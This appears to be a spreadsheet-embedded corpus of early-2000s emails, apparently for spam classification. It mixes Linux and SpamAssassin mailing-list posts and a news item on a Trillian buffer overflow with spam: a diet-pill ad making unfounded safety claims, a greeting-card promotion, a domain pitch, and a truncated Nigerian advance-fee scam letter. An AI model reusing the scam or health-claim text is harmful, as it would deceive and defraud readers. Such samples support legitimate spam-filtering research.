 &lt;/FONT&gt;&lt;FONT  COLOR="#0080ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" 
 SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;&lt;I&gt;&lt;U&gt;BERRY TRIM 
 PLUS&lt;/U&gt;&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;. &amp;nbsp;It seemed to contain everything I needed. &amp;nbsp;
 It curbs your appetite, increases energy, burns fat at the fastest rate 
 possible, no special diets are required, you don't have to exercise like a 
 lunatic, it doesn't make you feel speeded, &amp;nbsp;&lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" 
 BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 
 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;AND IT 'S ALL NATURAL WITH NO 
 ADVERSE SIDE EFFECTS&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt;. &amp;nbsp;It also was priced well below other products so 
 I figured that if it didn't work I wouldn't be out much money. &amp;nbsp;It is 
 guaranteed, but I'm always too lazy to bother to send back the empty bottles 
 so this diet supplement seemed perfect for me.&lt;BR&gt;
 &lt;BR&gt;
 It's been about 6 weeks now but I swear I'm beginning to look like that 
 famous Cindy person that models. &amp;nbsp;My cheekbones are absolutely glorious.. 
 I swear I look like a new person and a good one at that. &amp;nbsp;&lt;/FONT&gt;&lt;FONT  
 COLOR="#0080ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;&lt;I&gt;&lt;U&gt;BERRY TRIM 
 PLUS&lt;/U&gt; &lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" 
 style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" 
 FACE="Arial" LANG="0"&gt; also keeps your skin tight so you don't look like a 
 Shar Pei with nasty folds of skin hanging all around after you lose the weight.
 &lt;BR&gt;
 &lt;BR&gt;
 I promise you that this product works. &amp;nbsp;It does everything it promises 
 and then some. &amp;nbsp;Just losing the weight alone, makes you feel so much 
 better and younger. &amp;nbsp;It puts zest back into your life and assures you 
 that you'll achieve your weight loss goals. &amp;nbsp;In another few weeks I will 
 reach my goal...something I had given up on. &amp;nbsp;Also, &lt;/FONT&gt;&lt;FONT  
 COLOR="#ff0000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;HLNA&lt;/FONT&gt;&lt;FONT  
 COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt; &lt;/FONT&gt;&lt;FONT  
 COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt; offers an affiliate 
 program so you might as well make a few bucks while losing those pounds.
 Please keep the faith and order this product &lt;/FONT&gt;&lt;FONT  COLOR="#ff0000" 
 BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 PTSIZE=10 
 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;B&gt;NOW&lt;/B&gt; &lt;/FONT&gt;&lt;FONT  
 COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=2 
 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt; by clicking below.&lt;BR&gt;
  &lt;BR&gt;
 &lt;/FONT&gt;&lt;b&gt;&lt;a href="http://vfda.weedwaacker.com/index0625a.html"&gt;&lt;font 
 lang="0" color="#0000ff" size="5"&gt;CLICK
 HERE&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;font lang="0" color="#000000"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;FONT  COLOR="#000000" BACK="#ffffff" style="BACKGROUND-COLOR: 
 #ffffff" SIZE=2 PTSIZE=10 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;
 Sincerely,&lt;/FONT&gt;
 &lt;p&gt;&lt;font lang="0" color="#000000"&gt;Laurie&lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font lang="0" color="#000000"&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;font size="1"&gt;This message is brought to you by BerryTrim Affiliate#
 3b3773c002ce47b&lt;br&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;font size="1"&gt;We apologize for any email you may have
 inadvertently received.&lt;br&gt;
 Please &lt;a href="http://rmkid.weedwaacker.com"&gt;CLICK HERE&lt;/a&gt; to be removed 
 from
 future mailings.&lt;/font&gt;&lt;/p&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: send REAL PAPER GREETING CARDS on-line!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;Cards In Advance&lt;/TITLE&gt;
 &lt;META NAME="copyright" CONTENT="Copyright  2002, Cards In Advance. All rights reserved."&gt;
 &lt;STYLE&gt;
 &lt;!--
 A:link {text-decoration: none; font-size : 10pt; color: #0004B2}
 A:link.small {text-decoration: none; font-size : 10pt; color: #0004B2}
 A:link.white {text-decoration: none; font-size : 10pt; color: #F5F1F1}
 A:visited {text-decoration: none; font-size : 10pt; color: #0004B2}
 A:visited.small {text-decoration: none; font-size : 10pt; color: #0004B2}
 A:visited.white {text-decoration: none; font-size : 10pt; color: #F5F1F1}
 A:active {text-decoration: none; font-size : 10pt}
 A:hover {text-decoration: underline; font-size : 10pt; color: #CC0000 }
 A:hover.small {text-decoration: underline; font-size : 10pt; color: #CC0000 }
 A:hover.white {text-decoration: none; font-size : 10pt; color: #CC00000}
 td {font-family: Verdana; font-size: 10pt}
 input {font-size: 10px; background: #FFFFFF;}
 option {font-size: 10px; background: #FFFFFF;}
 select {font-size: 10px; background: #FFFFFF;}
 textarea {font-family: Verdana; font-size: 10pt}
 body {
 font-family: Verdana, Helvetica, sans-serif; font-size: 10pt
 margin-top: 0px;
 margin-left: 5px;
 margin-right: 0px;
 margin-bottom: 0px;
 scrollbar-face-color: #95BFE7;
 scrollbar-shadow-color: #DEEBF7;
 scrollbar-highlight-color: #ffffff;
 scrollbar-3dlight-color: #717171;
 scrollbar-darkshadow-color: #103884;
 scrollbar-track-color: #F1F5F9;
 scrollbar-arrow-color: #103884;
 }
 .w {color: #FFFFFF}
 .title {font-weight: bold;  font-family: Verdana; font-size: 12pt}
 .subtitle {font-weight: bold;  font-family: Verdana; font-size: 11pt}
 .small {font-family: Verdana; font-size: 8pt}
 .sb {font-family: Verdana; font-weight: bold; font-size: 8pt}
 .esb {font-family: Verdana; font-weight: bold; font-size: 7pt}
 .bi {font-weight: bold; font-style: italic}
 .rating {font-weight: bold; font-family: Verdana; font-size: 16pt; color: #C0000E}
 .web {font-family: Webdings; font-size: 18pt; color: #C0000E}
 .button {font-size: 10pt; color: #000000; background: #CECECE;}
 --&gt;
 &lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#FFFFFF" TOPMARGIN="0" LEFTMARGIN="0" LINK="#000000" ALINK="#808080" VLINK="#000000"&gt;
 &lt;A NAME="top"&gt;&lt;/A&gt;
 &lt;CENTER&gt;
 &lt;TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH=500&gt;
 &lt;TR&gt;&lt;TD&gt;&lt;A HREF="http://www.cardsinadvance.com/"&gt;&lt;IMG SRC="http://www.cardsinadvance.com/ads/images/cia_top.gif" ALT="CARDS IN ADVANCE" WIDTH=500 HEIGHT=66 VSPACE=1 BORDER=0&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=500 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top align=center WIDTH="209"&gt;
     &lt;TD align=center width=200 bgColor=#103884&gt;
 &lt;A HREF="http://www.cardsinadvance.com/"&gt;&lt;IMG src="http://www.cardsinadvance.com/ads/images/intro.gif" vspace=1 width=198 height=84 border=0&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;IMG SRC="http://www.cardsinadvance.com/ads/images/btt_eday.gif" ALT="EVERYDAY CARDS" VSPACE=2 HSPACE=5 WIDTH=142 HEIGHT=17&gt;&lt;BR&gt;
 &lt;TABLE BORDER=0 CELLSPACING=2 CELLPADDING=0&gt;
 &lt;TR VALIGN=TOP&gt;
 &lt;TD&gt;&lt;FORM ACTION="http://www.cardsinadvance.com/card_list.cfm" METHOD="GET"&gt;&lt;SELECT NAME="Card_Type"&gt;
 &lt;OPTION VALUE="BIRT" SELECTED&gt;Birthday&lt;/OPTION&gt;
 &lt;OPTION VALUE="ANNI"&gt;Anniversary&lt;/OPTION&gt;
 &lt;OPTION VALUE="GETW"&gt;Get Well Soon&lt;/OPTION&gt;
 &lt;OPTION VALUE="THIN"&gt;Thinking of you&lt;/OPTION&gt;
 &lt;OPTION VALUE="CONG"&gt;Congratulations&lt;/OPTION&gt;
 &lt;OPTION VALUE="SYMP"&gt;Sympathy&lt;/OPTION&gt;
 &lt;OPTION VALUE="ENGA"&gt;Engagement&lt;/OPTION&gt;
 &lt;OPTION VALUE="GOOD"&gt;Good Luck&lt;/OPTION&gt;
 &lt;OPTION VALUE="BABY"&gt;New Baby&lt;/OPTION&gt;
 &lt;OPTION VALUE="NEWH"&gt;New Home&lt;/OPTION&gt;
 &lt;OPTION VALUE="LOVE"&gt;Love &amp; Romance&lt;/OPTION&gt;
 &lt;OPTION VALUE="FRIE"&gt;Friendship&lt;/OPTION&gt;
 &lt;OPTION VALUE="RETI"&gt;Retirement&lt;/OPTION&gt;
 &lt;OPTION VALUE="GRAD"&gt;Graduation&lt;/OPTION&gt;
 &lt;OPTION VALUE="THAN"&gt;Thank You&lt;/OPTION&gt;
 &lt;/SELECT&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR VALIGN=TOP&gt;
 &lt;TD ALIGN=RIGHT&gt;&lt;INPUT TYPE="IMAGE" SRC="http://www.cardsinadvance.com/ads/images/btt_go.gif" NAME="GO" WIDTH=65 HEIGHT=15 VSPACE=0 BORDER=0&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;IMG SRC="http://www.cardsinadvance.com/ads/images/1x1.gif" VSPACE=0&gt;&lt;BR&gt;
 &lt;IMG SRC="http://www.cardsinadvance.com/ads/images/btt_hday.gif" ALT="HOLIDAY CARDS" VSPACE=2 HSPACE=5 WIDTH=129 HEIGHT=17&gt;&lt;BR&gt;
 &lt;TABLE BORDER=0 CELLSPACING=2 CELLPADDING=0&gt;
 &lt;TR VALIGN=TOP&gt;
 &lt;TD NOWRAP&gt;&lt;/FORM&gt;&lt;FORM ACTION="http://www.cardsinadvance.com/card_list.cfm" METHOD="GET"&gt;&lt;SELECT NAME="Card_Type"&gt;
 &lt;OPTION VALUE="VALE"&gt;Valentine's Day (Feb)&lt;/OPTION&gt;
 &lt;OPTION VALUE="PASS"&gt;Passover (Apr)&lt;/OPTION&gt;
 &lt;OPTION VALUE="EAST"&gt;Easter (Apr)&lt;/OPTION&gt;
 &lt;OPTION VALUE="MOTH" SELECTED&gt;Mother's Day (May)&lt;/OPTION&gt;
 &lt;OPTION VALUE="FATH"&gt;Father's Day (Jun)&lt;/OPTION&gt;
 &lt;OPTION VALUE="ROSH"&gt;Rosh Hashana (Sep)&lt;/OPTION&gt;
 &lt;OPTION VALUE="HALL"&gt;Halloween (Oct)&lt;/OPTION&gt;
 &lt;OPTION VALUE="TGIV"&gt;Thanksgiving (Nov)&lt;/OPTION&gt;
 &lt;OPTION VALUE="XMAS"&gt;Christmas (Dec)&lt;/OPTION&gt;
 &lt;OPTION VALUE="YEAR"&gt;Happy New Year (Dec)&lt;/OPTION&gt;
 &lt;OPTION VALUE="HANN"&gt;Hanukkah (Dec)&lt;/OPTION&gt;
 &lt;/SELECT&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;TR VALIGN=TOP&gt;
 &lt;TD ALIGN=RIGHT&gt;&lt;INPUT TYPE="IMAGE" SRC="http://www.cardsinadvance.com/ads/images/btt_go.gif" NAME="GO" WIDTH=65 HEIGHT=15 VSPACE=0 BORDER=0&gt;&lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;IMG SRC="http://www.cardsinadvance.com/ads/images/hw.gif" ALT="ALL OUR CARDS ARE HANDWRITTEN!" WIDTH=149 HEIGHT=30 VSPACE=5 BORDER=0&gt;&lt;BR&gt;&lt;IMG SRC="http://www.cardsinadvance.com/ads/images/recycle.gif" ALT="CARDS IN ADVANCE USES QUALITY CARDS MADE FROM RECYCLED PAPER" WIDTH=150 HEIGHT=59 VSPACE=4 BORDER=0&gt;
 &lt;/CENTER&gt;&lt;/TD&gt;
     &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=291&gt;&lt;FONT face=Verdana size=2&gt;
 &lt;!--- Right Cell Start ---&gt;
 &lt;A HREF="http://www.cardsinadvance.com/"&gt;&lt;IMG src="http://www.cardsinadvance.com/ads/images/elevator.jpg" width=290 height=312 vspace=0 border=0&gt;&lt;/A&gt;
 &lt;A HREF="http://www.cardsinadvance.com/"&gt;&lt;IMG src="http://www.cardsinadvance.com/ads/images/cia_sm.gif" width=127 height=11 vspace=3 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.cardsinadvance.com/"&gt;&lt;IMG src="http://www.cardsinadvance.com/ads/images/elevator_slogan.gif" width=188 height=14 vspace=5 border=0&gt;&lt;/A&gt;&lt;BR&gt;
 &lt;!--- Right Cell End ---&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=500 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;IMG height=34 src="http://www.cardsinadvance.com/ads/images/cia_bot1.gif" width=500 vspace=1
       border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=3 width=500 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;&lt;FONT face=Verdana color="#808080" size=1&gt;&lt;BR&gt;You received this email because you signed up at one of Cards In Advance's websites or you signed up with a party that has contracted with Cards In Advance. To unsubscribe from the Cards In Advance mailing list please reply to this email with "remove" as the subject.&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;/CENTER&gt;
 &lt;/FONT&gt;
 &lt;/FORM&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] SUSE 8 disks? (thread changed slightly)
</t>
  </si>
  <si>
    <t xml:space="preserve">hey,
 AFAIK it isn't hard at all to create
 your own modified version of the redhat
 distro.  There's even a tarball[1] with this
 specifically in mind.  The people who built
 the Ximian version of RedHat used a system
 similar to said tarball.
 Building a distro which uses a *BSD ports
 system rather than rpm, deb or whatever
 would complicate things a tad more IMHO.
 It *is* a good idea though.  I've been 
 wondering about the same thing for a couple
 of months now but always considered it too
 complicated to carry out. (If that makes any
 sense at all).
 I don't discount any other work like for 
 example Niall's work on the B.B.C. but maybe
 there is general interest in an Irish distro.
 Anyone?
 Regards,
 Shane.
 -----Original Message-----
 From: wintermute [mailto:cout@eircom.net]
 Sent: 13 August 2002 00:48
 To: ilug@linux.ie
 Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
 Rick Moen &lt;rick@linuxmafia.com&gt; wrote:
 &lt;snip&gt;
 &gt; Don't like SuSE's product licensing?  Write your own distribution.  You
 &gt; can even grab most of what you need _from SuSE_.  All you have to do is 
 &gt; heed the licensing terms on the individual pieces.
 &lt;snip&gt;
 How unimaginably difficult is this to do?
 There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right?
 Right.
 Yes it might be very,very difficult and subject to abject failure 
 in sticking together a distro.... call it Dolmen Linux (or other), 
 no doubt the packaging system would be one of the first places
  such a suggestion would stumble.
 Some (like me) favouring a FreeBSD style ports system others favouring
  a Debian style system and others still favouring *rpm style packaging.
 That said other *LUG have done interesting things like making blackbox.
 Perhaps making a distro would be ..... umm.... fun.
 Just a pseudo random thought.
 I'm only laughing on the outside 
 My smile is just skin deep 
 If you could see inside I'm really crying 
 You might join me for a weep.
 &lt;&lt;At your service Madame&gt;&gt;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</si>
  <si>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gkrellm 2 plugins?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Matthias,
 I think I could do help you out with new plugins package for gkrellm 2. 
 Would you prefer to keep it as it is now, or package every plugin
 separately?  The latter would be probably easier to maintain.
 -- 
 \/ille Skytt
 ville.skytta at iki.fi
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Guido&gt; Takers?  How is ESR's bogofilter packaged?  SpamAssassin?  The
     Guido&gt; Perl Bayes filter advertised on slashdot?
 Dunno about the other tools, but SpamAssassin is a breeze to incorporate
 into a procmail environment.  Lots of people use it in many other ways.  For
 performance reasons, many people run a spamd process and then invoke a small
 C program called spamc which shoots the message over to spamd and passes the
 result back out.  I think spambayes in incremental mode is probably fast
 enough to not require such tricks (though I would consider changing the
 pickle to an anydbm file).
 Basic procmail usage goes something like this:
     :0fw
     | spamassassin -P
     :0
     * ^X-Spam-Status: Yes
     $SPAM
 Which just says, "Run spamassassin -P reinjecting its output into the
 processing stream.  If the resulting mail has a header which begins
 "X-Spam-Status: Yes", toss it into the folder indicated by the variable
 $SPAM.
 SpamAssassin also adds other headers as well, which give you more detail
 about how its tests fared.  I'd like to see spambayes operate in at least
 this way: do its thing then return a message to stdout with a modified set
 of headers which further processing downstream can key on.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] re: how to register one of the new domain extensions
</t>
  </si>
  <si>
    <t xml:space="preserve">IMPORTANT DOMAIN INFORMATION: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http://www.domainsforeveryone.com/ today for more info.
 Register your domain name today for just $14.95 at: http://www.domainsforeveryone.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Domains For Everyone
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 (b1)0474aQIz9-237xTMz9546aZDm1-521Lllj5910RDZl1-150RKYm2509Gxri8-258Tytl2824AfwK4-512Qxl78
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Signers weren't angry young men  (was: Java is for kiddies)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I stand corrected --- I'd thought I'd seen a display there listing in
 the Ben Franklin museum which showed them as ranging in age from 19 to
 just over 30 for the oldest, most in their early twenties.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] 2.40 RELEASE: oops -- newer freqs.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Craig R.Hughes" said:
 &gt; The GA run on the current corpus is yielding an average (mean) 
 &gt; score for false-positives of about 10 points, which is higher 
 &gt; than before.  There's some tweaking to be done yet (rule 
 &gt; elimination and such), so that will likely fall, but -15 might 
 &gt; not be enough of a correction in many situations.  I will set 
 &gt; the scores for the Habeas stuff and the Ironport stuff to be 
 &gt; sensible given:
 &gt; 
 &gt; a) estimated likeliness of compliance with Habeas/Bonded sender 
 &gt; rules, and
 &gt; b) score correction level needed to achieve purposes of those projects.
 Using the score-ranges stuff and my aggressive anti-FP evaluation code,
 BTW, yielded an average FP of 5.7 points, with 0.67% FPs and 96.57%
 overall accuracy -- but I notice you went back to the other method.
 Just pointing this out ;)
 --j.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</si>
  <si>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buffer overflows
</t>
  </si>
  <si>
    <t xml:space="preserve">Didn't we just have a discussion on FoRK how hard
 it is nowadays to write something that's not
 buffer overflow protected? 
 http://news.zdnet.co.uk/story/0,,t269-s2121250,00.html
 Location: http://news.zdnet.co.uk/story/0,,t269-s2121250,00.html 
 IM client vulnerable to attack 
 IM client vulnerable to attack 
 James Pearce, ZDNet Australia  
 Users of messenger client Trillian are vulnerable to attack, according to
 information security analyst John Hennessy.
 Hennessy has published a proof-of-concept showing the latest version of
 Trillian, v0.73, is vulnerable to a buffer-overflow attack that will
 allow individuals with malicious intent to run any program on the
 computer.
 Trillion is a piece of software that allows you to connect to ICQ, AOL
 Instant Messenger, MSN Messenger, Yahoo! Messenger and IRC with a single
 interface, despite some companies actively avoiding messenger
 interoperability.
 According to Jason Ross, senior analyst at amr interactive, in June 2002
 there were 28,000 home users of Trillian in Australia, about 0.4 percent
 of the Internet population, and 55,000 people using it at work, about 1.8
 percent of the Internet population.
 David Banes, regional manager of Symantec security response, told ZDNet
 Australia the code appeared to be valid.
 "With these sort of things you have to find some process that would
 accept a connection, then throw loads of random data at it and get it to
 crash," he said. "Once it's crashed, you can try to find a way to exploit
 it."
 He said the proof-of-concept that was published is designed to run on
 Notepad, but could be easily modified to run any program on the system.
 He said the problem was easy to fix by "writing protective code around
 that particular piece to more closely validate the data around that
 piece."
 "Because people are pushed for productivity you tend to leave out the
 checks and balances you should put in, which is why we have all these
 buffer overflows and exploits out there now," said Banes.
 Cerulean Studios, creator of Trillian, was contacted for comment but had
 not responded by the time of publication.
 ------------------------------------------------------------------------
 For all security-related news, including updates on the latest viruses,
 hacking exploits and patches, check out ZDNet UK's Security News Section.
 Have your say instantly, and see what others have said. Go to the
 Security forum.
 Let the editors know what you think in the Mailroom.
 Copyright  2002 CNET Networks, Inc. All Rights Reserved. 
 ZDNET is a registered service mark of CNET Networks, Inc. ZDNET Logo is a service mark of CNET NETWORKS,
 Inc.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "O" == Owen Byrne &lt;owen@permafrost.net&gt; writes:
     O&gt; From the local paper this morning.  "Canadians eat about seven
     O&gt; times as many doughnuts per capita"... (as Americans) . D'oh!
 If we had more variety of franchise food than the
 Wendys/KFC/PizzaHut/TacoBell/TimHorton's monopoly (they are all Pepsi
 under the hood, aren't they?), things might be different.  When a New
 Yorker has biscotti, we have a timbit, when a Parisienne has a
 croissant, we have a timbit ... because that's all we can buy.
 The USA is a nation founded on creative free enterprise entrepreneurs;
 Canada is a nation built on monopolies.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Naming theories
</t>
  </si>
  <si>
    <t xml:space="preserve">I've noticed that the theories on the interconnection
 between the latest RH releases is lagging a bit.  In
 the interests of a fun discussion, anyone have any
 ideas?
 So here's some conspiracy bits to lay out.  Can anyone
 fit the pieces together?
 "Chesapeake Skipjacks" are a class of boats:
 http://carloulton.htmlplanet.com/SKIPJACK/boat.html
 Also note: "They were developed from the lines of the
 Chesapeake Bay Log Canoe, the Brogan, and the famous
 Clipper Ships." Clipper Ships (Chips)?  
 Chesapeake College's mascot(s) is(are) the Skipjacks:
 http://www.chesapeake.edu/athletics/athletics_side.asp?sport=6
 This guy owns a "Chesapeake 32" named "Valhalla":
 http://www.matella.com/chesapeake1.htm
 Now, Valhalla -&gt; Limbo seems a little clearer, both
 being afterlife-ish concepts of roughly Norse
 extraction.
 Anyone else?
 .Doug
 __________________________________________________
 Do You Yahoo!?
 HotJobs - Search Thousands of New Jobs
 http://www.hotjobs.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-03
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * This Week on perl5-porters (26 August / 1st September 2002)
     * The Perl Review, v0 i5
 +--------------------------------------------------------------------+
 | This Week on perl5-porters (26 August / 1st September 2002)        |
 |   posted by rafael on Monday September 02, @03:47 (summaries)      |
 |   http://use.perl.org/article.pl?sid=02/09/02/0755208              |
 +--------------------------------------------------------------------+
 This week, we're back to our regularly scheduled p5p report, straight
 from my keyboard's mouth. Many thanks to Elizabeth Mattjisen who provided
 the two previous reports, while I was away from p5p and from whatever
 might evocate more or less a computer.
 This story continues at:
     http://use.perl.org/article.pl?sid=02/09/02/0755208
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/02/0755208
 +--------------------------------------------------------------------+
 | The Perl Review, v0 i5                                             |
 |   posted by ziggy on Monday September 02, @14:20 (news)            |
 |   http://use.perl.org/article.pl?sid=02/09/02/1823229              |
 +--------------------------------------------------------------------+
 [0]brian_d_foy writes "The latest issue of The Perl Review is ready:
 [1]http://www.theperlreview.com
   * Extreme Mowing -- Andy Lester
   * Perl Assembly Language -- Phil Crow
   * What Perl Programmers Should Know About Java -- Beth Linker
   * Filehandle Ties -- Robby Walker
   * The Iterator Design Pattern -- brian d foy
     Enjoy!"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/02/1823229
 Links:
     0. http://www.theperlreview.com
     1. http://www.theperlreview.com/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</si>
  <si>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REQUEST
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM:MR JOE MARK
 EMAIL FAX: 1 561 619 2791
 EMAIL:mrjoemark@yahoo.com
 DEAR SIR
 REQUEST FOR URGENT BUSINESS RELATIONSHIP  STRICTLY
 CONFIDENTIAL.
 Firstly, I must solicit your strictest confidentiality
 in this transaction. This is by virtue of its nature
 as being utterly CONFIDENTIAL and TOP SECRET. Though
 I know that a transaction of this magnitude will make
 anyone apprehensive and worried, but I am assuring you
 that all will be well at the end of the day. 
 We have decided to contact you first by your email due
 to the urgency of this transaction, as we have been
 reliably informed that it will take at least two to
 three weeks for a normal post to reach you. So we
 decided it is best using the email. Let me start by
 first introducing myself properly to you. I am Dr.
 Kaku Opa, a director general in the Ministry 
 of Mines and Power and I head a Three-man tender board
 appointed by the Government of the Federal Republic of
 Nigeria to award contracts to individuals and
 companies and to approve such contract payments in the
 Ministry of Mines and Power. The duties of the
 committee also include evaluation, vetting and
 monitoring of work done by foreign and local
 contractors in the ministry.
 I came to know of you in my search for a reliable and
 reputable person to handle a very confidential
 business transaction which involves the transfer of a
 huge sum of money to a foreign account requiring
 maximum confidence. In order to commence this
 business, we solicit for your assistance to enable us
 transfer into your account the said funds. 
 The source of this funds is as follows: Between 1996
 and 1997, this committee awarded contracts to various
 contractors for engineering, procurement, supply of
 electrical equipments such as Transformers, and some
 rural electrification projects. 
 However, these contracts were over-invoiced by the
 committee, thereby, leaving the sum of US$11.5million
 dollars (Eleven Million Five Hundred thousand United
 States Dollars) in excess. This was done with the
 intention that the committee will share the excess
 when the payments are approved. 
 The Federal Government have since approved the total
 contract sum which has been paid out to the companies
 and contractors concerned which executed the
 contracts, leaving the balance of $11.5m dollars,
 which we need your assistance to transfer into a safe
 off-shore and reliable account to be disbursed amongst
 ourselves.
 We need your assistance as the funds are presently
 secured in an escrow account of the Federal Government
 specifically set aside for the settlement of
 outstanding payments to foreign contractors. We are
 handicapped 
 in the circumstances as the civil service code of
 conduct, does not allow us to operate off-shore
 accounts, hence your importance in the whole
 transaction. 
 My colleagues and I have agreed that if you or your
 company can act as the beneficiary of this funds on
 our behalf, you or your company will retain 20% of the
 total amount of US$11,500,000.00 (Eleven Million Five
 Hundred Thousand United States Dollars), while 70%
 will be for us (members of this panel) and the
 remaining 10% will be used in offsetting all
 debts/expenses incurred (both local and foreign) in
 the cause of this transfer. Needless to say, the trust
 reposed on you at this juncture is enormous. In return
 we demand your complete honesty and trust. 
 It does not matter whether or not your company does
 contract projects of this nature described here, the
 assumption is that your company won the major contract
 and sub-contracted it out to other companies.  More
 often than not, big trading companies or firms of
 unrelated fields win major contracts and subcontract
 to more specialized firms for execution of such
 contracts. We are civil servants and we will not want
 to miss this once in a life time opportunity.
